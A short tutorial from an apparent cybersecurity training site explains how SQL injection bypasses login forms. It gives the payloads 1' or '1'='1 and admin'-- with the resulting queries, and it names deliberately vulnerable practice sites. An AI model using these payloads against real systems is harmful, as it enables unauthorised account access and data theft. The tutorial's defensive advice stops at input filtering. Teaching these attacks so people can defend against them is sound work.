Ready to Start Your Career?

Bypass Logins Using SQL Injection

Sahad Mk's profile image

By: Sahad Mk

April 19, 2021

This tutorial will explain how to bypass the login form and how it works using SQL injection. An SQL injection is a type of attack where you input an SQL query into a web form to extract information from the database. SQL stands for Structured Query Language and is used to control the databases of web applications. You can bypass a website's security features and get information directly from a company's database by entering the right query. For example, you could send a request that gives you all of the usernames and passwords associated with a website (if it's a very insecure website).

If you have ever visited a website, you must provide a username/email and a password. When you have the right combination, you are allowed to log in. In other cases, you can't access your account. In this example, let's suppose the username/email field is not configured to filter out SQL queries. We pass some random input, email: "bdhbhdm" and password: "123456". When you type in this information and press enter, the query is as follows:

SELECT id FROM users WHERE username='bdhbhdm' and password='123456'

The query runs in the database to check whether the username and password are valid. The server will look in the database to see if an account has the username "bdhbhdm" and a password "123456". If the credentials are correct, then the query retrieves that particular account. Otherwise, it displays an error message.

Enroll TODAY to start learning Cyber Security with these Courses:

We can use SQL injection to bypass the login and get access. Here, we use the inputs:

  1. username: 1' or '1'='1 and password: 1' or '1'='1. So the query becomes,

SELECT id FROM users WHERE username='1' or '1'='1 ' and password='1' or '1'='1 '

What we're doing with this query is telling the database if you find an account where the username and password are 1 or if the statement 1=1 is true, grant us access. Since the statement 1=1 is always true, the database will grant you access.

  1. username: admin'-- and password: anything. In this case, the query becomes,

SELECT id FROM users WHERE username='admin' -- and password='xxxxx 'The two dash characters (--) ignore the part after its position. So the query only checks the username, and the attacker will gain access to the admin account.

Notes

  1. This type of attack can be defeated by validating inputs in a form.
  2. The SQL injection payload works based on the type of database.
  3. Search "SQL injection cheat sheet" in Google for more payloads.
  4. You can test this attack legally on the websites below:
  • demo.testfire.net
  • testphp.vulnweb.com

Conclusion An SQL injection is a type of cyberattack that uses well-crafted SQL queries to bypass the security features. If a site has unfiltered web forms, these SQL queries will be sent directly to the database and grant user access. This attack type can be used to get admin-level access, which would allow them to make changes, add new accounts, or steal important company information. The best defense against SQL injection attacks is to make sure your input forms are configured correctly to filter out SQL queries.

Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry